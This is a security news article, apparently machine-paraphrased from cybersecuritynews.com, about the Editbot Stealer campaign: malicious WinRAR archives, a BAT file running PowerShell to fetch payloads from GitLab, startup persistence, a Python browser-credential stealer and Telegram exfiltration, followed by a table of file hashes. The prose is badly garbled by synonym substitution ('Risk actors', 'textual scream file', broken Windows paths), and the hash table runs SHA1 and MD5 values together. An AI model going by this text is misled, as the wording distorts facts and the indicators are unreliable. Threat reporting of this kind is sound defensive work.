New Editbot Stealer in Action; Stealing Browser Passwords & Cookies
A brand recent malicious advertising and marketing and marketing and marketing campaign, Editbot Stealer, used to be discovered wherein threat actors utilize WinRAR archive info with minimal detection to originate a multi-stage assault. Risk actors had been the utilization of the theme of “atrocious product to be sent back” to entice users to their false web sites.
On the opposite hand, the malicious WinRAR archive pale by the threat actors contains a .bat file and a JSON file for initial stage assaults, adopted by some Powershell commands for additional stages. The distribution of these malicious info used to be accomplished via social media.
Editbot Stealer in Movement
Initial Gain entry to & Persistence
In line with the studies shared with Cyber Safety News, the BAT file pale in the initial stages of the assault goes by the title “Screenshot Product Photo Sample.bat” containing a few Powershell commands for downloading and executing additional payloads.
The main PowerShell declare within the BAT file downloads any other BAT file from Gitlab and saves it below the title “WindowsSecure.bat” in the startup folder for chronic execution. This BAT file is pale to customarily attain the Python stealer, which is downloaded later in the assault stage.
The second PowerShell declare retrieves a ZIP file named “File.zip” from the the same GitLab repository and saves it in the C:CustomersPublic list. The third powershell declare extracts this ZIP file into the C:CustomersPublicPaperwork list containing the python stealer “libb1.py”.
Working of the Python Stealer – Editbot
The Python stealer contains sophisticated programming code that performs lots of functions, including extracting the country code, IP address, and timestamp of the victims, alongside with the credential-stealing actions linked to lots of browsers.
This stealer extracts a few gadgets of data, equivalent to cookies, login data, web data, and local divulge, from the browser profile folder and retail outlets them within the %temp% folder. The whole stolen info is saved in a textual scream file named “budge.txt”.
After amassing the general info from the sufferer, the stealer creates a ZIP archive of the general extracted info and retail outlets them within the the same %temp% list. To exfiltrate this info, the threat actors relish living up telegram bots.
Furthermore, a whole document referring to the Editbot stealer has been printed, which presents detailed info on the source code, extraction blueprint, and other info.
Indicators of Compromise
Indicators | Indicator Form | Main aspects |
fd8391a1a0115880e8c3ee2e76fbce741f1b3c5fbcb728b9fac37c21e9f6d7b7 feff390b99dfe7619a20748582279bc13c04f52aca5bee4607ddd920729e5c2b4fc89bbc | SHA256 SHA1MD5 | Screenshot-Product-Photo-Sample_25929.rar |
d13aba752f86757de6628e833f4fdf4c625f480056e93b919172e9c309448b80 18e96d94089086848a0569a1e1d8051da0f6f444e9e4cd111cadcf94c469365354df3fdc | SHA256 SHA1MD5 | Screenshot Product Photo Sample.bat |
3f7bd47fbbf1fb0a63ba955c8f9139d6500b6737e5baf5fdb783f0cedae94d6d eed59a282588778ffbc772085b03d229a5d99e35669e7ac187fb57c4d90b07d9a6bb1d42 | SHA256 SHA1MD5 | Python stealer (libb1.py) |
9d048e99bed4ced4f37d91a29763257a1592adb2bc8e17a66fa07a922a0537d0 93d70f02b2ee2c4c2cd8262011ed21317c7d92def23465088d26e90514b5661936016c05 | SHA256 SHA1MD5 | product-_img_2023-12_86-13a30f_13373.rar |
bc3993769a5f82e454acef92dc2362c43bf7d6b6b203db7db8803faa996229aa cf019e96e16fdaa504b29075aded36be27691956c3a447c5c6c73d80490347c1b4afe9d5 | SHA256 SHA1MD5 | record – photo_product _2023-12_86-13a30ff503fd6638c5863dta.bat |
Source credit : cybersecuritynews.com